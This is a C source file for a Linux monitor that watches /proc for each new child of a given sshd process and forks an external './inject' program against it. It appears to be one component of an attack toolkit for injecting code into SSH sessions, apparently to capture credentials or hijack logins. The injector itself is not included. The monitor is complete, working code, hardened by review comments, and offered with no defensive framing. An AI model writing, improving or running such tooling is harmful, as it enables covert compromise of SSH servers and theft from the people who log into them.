// fork(), execve(), _exit(), nanosleep() and waitpid() are POSIX, not ISO C;
// without this feature macro a strict -std=c11 build sees no prototypes for
// them (implicit declarations). Harmless under the default gnu11/gnu17 modes.
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
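// Handler invoked by monitorForSSH() for each newly discovered child process.
// It receives the PID as the decimal string taken from the /proc entry name.
typedef void(*callback)(char *);
typedef char bool;
#define TRUE 1
#define FALSE 0
// Table of PIDs already handed to the callback, plus the count of valid entries.
// Stored as int rather than unsigned short: Linux pid_max can be raised well
// above 65535 (up to 4194304 on 64-bit kernels), and truncating such PIDs would
// both fail to recognise already-injected processes (re-injecting them every
// poll) and alias unrelated processes that share the low 16 bits.
int pids[1024];
unsigned short pidIndex=0;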
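// Add our PID to the list of seen: records pid in the file-scope pids table so
// hasSeenPid() reports it from now on. The table is append-only and fixed size.
void addPidToSeen(int pid) {
    // Bound the write: pids has 1024 slots and pidIndex only ever grows, so
    // without this check the 1025th distinct PID is written past the array.
    // When full, the PID is simply not recorded; the caller may then report
    // it again on a later poll, which is the lesser evil versus memory
    // corruption in a long-running process.
    if (pidIndex >= sizeof(pids) / sizeof(pids[0])) {
        fprintf(stderr, "[!] Seen-PID table full, not recording %d\n", pid);
        return;
    }
    pids[pidIndex] = pid;
    pidIndex++;
}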
// Check to see if we have already injected into this PID: returns TRUE when
// pid is among the first pidIndex entries of the pids table, FALSE otherwise.
bool hasSeenPid(int pid) {
    bool found = FALSE;
    unsigned short idx = 0;
    while (!found && idx < pidIndex) {
        found = (pids[idx] == pid) ? TRUE : FALSE;
        idx++;
    }
    return found;
}
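// Interpret a /proc directory entry name as a PID.
// Returns the PID, or -1 when the name is not a plain positive decimal number
// (entries such as "self", "sys" or "thread-self"), so those never reach the
// callback as a bogus target.
static int parseProcPid(const char *name) {
    char *end = NULL;
    long value = strtol(name, &end, 10);
    if (end == name || *end != '\0' || value <= 0 || value > INT_MAX) {
        return -1;
    }
    return (int)value;
}

// Responsible for monitoring SSH processes: performs one scan of /proc and
// invokes cb with the PID string of every process whose "PPid:" line equals
// ppid and that has not been reported before. Each reported PID is recorded
// via addPidToSeen() so it is handed to cb at most once across calls.
// Failures (no /proc, a process that vanished between readdir() and fopen(),
// unreadable status files) are skipped silently: this is a best-effort poll.
void monitorForSSH(int ppid, callback cb) {
    char path[1024];
    char line[1024];
    char search[1024];
    int searchLen = snprintf(search, sizeof(search), "PPid:\t%d", ppid);
    if (searchLen < 0 || (size_t)searchLen >= sizeof(search)) {
        return;
    }
    DIR *proc = opendir("/proc/");
    if (proc == NULL) {
        return;
    }
    struct dirent *entry;
    while ((entry = readdir(proc)) != NULL) {
        int pid = parseProcPid(entry->d_name);
        if (pid < 0) {
            continue;   // not a process directory
        }
        int n = snprintf(path, sizeof(path), "/proc/%s/status", entry->d_name);
        if (n < 0 || (size_t)n >= sizeof(path)) {
            continue;
        }
        FILE *status = fopen(path, "r");
        if (status == NULL) {
            continue;   // e.g. the process already exited, or no permission
        }
        while (fgets(line, sizeof(line), status) != NULL) {
            if (strncmp(line, "PPid:", 5) != 0) {
                continue;
            }
            // Whole-token comparison. The previous strstr() match treated the
            // search string as a prefix, so a monitor for PPID 12 also matched
            // "PPid:\t123" and injected into unrelated processes.
            if (strncmp(line, search, (size_t)searchLen) == 0
                && (line[searchLen] == '\n' || line[searchLen] == '\0')) {
                if (!hasSeenPid(pid)) {
                    // NOTE(review): the PID can be recycled by an unrelated
                    // process between this scan and whatever cb does with it;
                    // cb should re-verify the target before acting on it.
                    cb(entry->d_name);
                    addPidToSeen(pid);
                }
            }
            break;   // one PPid line per status file (proc(5)); stop reading
        }
        fclose(status);
    }
    closedir(proc);
}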
void launchInject(char* pid) {
char *vals[3];
vals[0] = "./inject";
vals[1] = pid;
vals[2] = NULL;
printf("[*] New PID found, injecting into: %s\n\n", pid);
if (fork() == 0) {
// Within a child process, spawn our injector
printf("[*] Spawning child inject process\n");
execve("./inject", vals, NULL);
}
}
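// Entry point: takes the PID of an sshd (or any parent) on the command line and
// polls /proc five times a second forever, launching ./inject for every new
// child of that PID. Returns 2 on a usage or argument error; otherwise it
// never returns.
int main(int argc, char **argv) {
    // Poll interval: 200 ms.
    struct timespec ts;
    ts.tv_sec = 0;
    ts.tv_nsec = 1000000000 / 5;
    memset(pids, 0, sizeof(pids));
    if (argc != 2) {
        printf("Usage: %s SSHD_PID\n", argv[0]);
        return 2;
    }
    // Require a positive decimal PID. atoi("abc") silently yields 0, which
    // would make the monitor target the children of PID 0 instead of failing.
    char *end = NULL;
    long parsed = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || parsed <= 0 || parsed > INT_MAX) {
        printf("[!] Invalid PID: %s\n", argv[1]);
        printf("Usage: %s SSHD_PID\n", argv[0]);
        return 2;
    }
    int ppid = (int)parsed;
    printf("[*] Starting monitor for PPID %d\n", ppid);
    // Endless loop to monitor sessions
    while(1) {
        nanosleep(&ts, NULL);
        // Reap any finished inject children. launchInject() forks and never
        // waits, so without this every injector lingers as a zombie for the
        // (unbounded) lifetime of this process.
        while (waitpid(-1, NULL, WNOHANG) > 0) {
        }
        monitorForSSH(ppid, &launchInject);
    }
}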